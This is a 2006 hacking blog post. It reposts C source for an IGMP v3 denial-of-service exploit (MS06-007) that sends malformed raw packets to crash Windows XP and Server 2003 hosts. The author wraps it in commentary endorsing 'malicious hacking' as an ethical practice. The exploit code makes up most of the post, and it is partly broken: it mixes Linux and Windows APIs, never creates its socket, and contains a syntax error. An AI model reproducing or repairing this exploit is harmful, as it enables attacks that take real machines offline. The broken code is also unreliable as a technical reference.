« Home

Internet Explorer CSS DoS exploit »iPod DDoS project »Hacking Browsers (faking address bars) »Browser Fuzzing »Conducting your Own Overflow »Faces »when technology is a part of the whole!: Hacking I... »Anonymous Webbrowsing continued »Track Anyone With a Cell Phone »Microsoft IIS Malformed URI DoS » 

Return of the IGMP attack?

Published 7.06.2006 by jm | E-mail this post

E-mail this post



Remember me (?)



All personal information that you provide here will be governed by the Privacy Policy of Blogger.com. More...


I've having trouble completing this. I orriginally read about it on Securiteam's website, and now I'm trying to write my own version. My version is for linux, and not windows. I am posting it here more as a reminder and reference, and don't claim any credit (yet). More to come after reasearch.


/*
IGMP v3 DoS Exploit

ref: http://www.juniper.net/security/auto/vulnerabilities/vuln2866.html
ref: http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx

by Alexey Sintsov (dookie@inbox.ru)

Req:
Administrator rights on system
Windows Firewall off (for sending RAW packets)

Affected Products:
Microsoft Corporation Windows XP All
Microsoft Corporation Windows Server 2003 All
*/


#include <stdio.h>
#include <sys/socket.h>

typedef struct iphdr
{
unsigned char verlen; // IP version & length
unsigned char tos; // Type of service
unsigned short total_len; // Total length of the packet
unsigned short ident; // Unique identifier
unsigned short frag_and_flags; // Flags
unsigned char ttl; // Time to live
unsigned char proto; // Protocol (TCP, UDP etc)
unsigned short checksum; // IP checksum
unsigned int sourceIP; // Source IP
unsigned int destIP; // Destination IP
unsigned short options[2];

} IPHEADER;

typedef struct igmphdr {
unsigned char type;
unsigned char code;
unsigned short checksum;
unsigned long group;
unsigned char ResvSQVR;
unsigned char QQIC;
unsigned short num;
unsigned long addes;

} IGMPHEADER;

USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;

while (size > 1) {
cksum += *buffer++;
size -= sizeof(USHORT);
}

if (size)
cksum += *(UCHAR*)buffer;

cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);

return (USHORT)(~cksum);
}

int sendIGMP(char* a, char* b)
{
unsigned int dst_addr, src_addr;

IPHEADER ipHeader;
IGMPHEADER igmpHeader;
dst_addr=inet_addr (b);
src_addr=inet_addr (a);

char szSendBuf[60]={0};
int rect;

SOCKET sock;

BOOL flag=TRUE;
if (setsockopt(sock,IPPROTO_IP,2,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
printf("Set options error");
closesocket(sock);
WSACleanup();
return FALSE;
}

SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family=AF_INET;
ssin.sin_port=htons(99);
ssin.sin_addr.s_addr=dst_addr;

ipHeader.verlen=(4<<4 sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(igmpHeader));

ipHeader.ident=htons(0);

ipHeader.frag_and_flags=0;

ipHeader.ttl=128;
ipHeader.proto=IPPROTO_IGMP;

ipHeader.checksum=0;

ipHeader.tos=0;

ipHeader.destIP=dst_addr;
ipHeader.sourceIP=src_addr;

//Ip options
ipHeader.options[0]=htons(0x0000); //bug is here =)
ipHeader.options[1]=htons(0x0000);

igmpHeader.type=0x11; //v3 Membership Query
igmpHeader.code=5;
igmpHeader.num=htons(1);
igmpHeader.ResvSQVR=0x0;
igmpHeader.QQIC=0;
igmpHeader.group=inet_addr("0.0.0.0");
igmpHeader.addes=dst_addr;

igmpHeader.checksum=0;

memcpy(szSendBuf, &igmpHeader, sizeof(igmpHeader));

igmpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(igmpHeader));

memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &igmpHeader, sizeof(igmpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(igmpHeader), 0, 4);

ipHeader.checksum=ntohs(checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader)));

memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));

rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));

if (rect==SOCKET_ERROR) {
printf("Send error: <%d>\n",WSAGetLastError());
closesocket(sock);
return 0;
}

closesocket(sock);


return 1;
}

main(int argc, char **argv)
{
if(argc<2)
{
printf("\nIGMP v3 DoS Exploit (MS06-007) by Alexey Sintsov(dookie@inbox.ru)\n\n");
printf("Usage:\n");
printf("c:\\igmps.exe <target ip> <source ip>\n\n");
exit(0);
}

sendIGMP(argv[2], argv[1]);
return 0;
}

    If the human body was never exposed to ailments, it would be impressivly vulnerable to the slightest cold. If our country was never exposed to hacking, it would be oppressivly vulnerable to cyber terrorism. With out the creation of a malicious hacking, Afganistan could have destroyed America's economy with a ping flood. This is why I encourange maclicious hacking, as an ethical practice. Without strengthening our defenses, we are weak. This site is focused on security through knowledge. I detest the fact that so many companies are being exploited because malicious hackers know their security holes before they do. For that reason, I hope to educate where the exploits lay. This isn't a 100% information base, as I only publish things I have been able to implement on myself. No credit is needed anywhere . However if you are a publisher, I would appriciate credit. I am an advocate of open source, so copy and paste and call it your own if you like. If my work is good enough for you to plagerize then that is my biggest compliment . If my work is good enough, I will be approached and asked to write more ... this is natural selection of the digital age .

Previous hacks

Previous Hacks



    This link kills spam


    spam IP addresses


    These are sites I block at my firewall.

    cdn2.gms1.net
    gms1.net
    servedby.advertising.com
    advertising.com
    a.tribalfusion.com
    tribalfusion.com
    pimpslord.com
    altfarm.mediaplex.com
    mediaplex.com
    ad.yeildmanager.com
    yeildmanager.com
    doubleclick.net
    isg32.casalemedia.com
    casalemedia.com

    Cost of the War in Iraq
    (JavaScript Error)

Two very recommended books:


. . The only hacking forum I have found worth mentioning here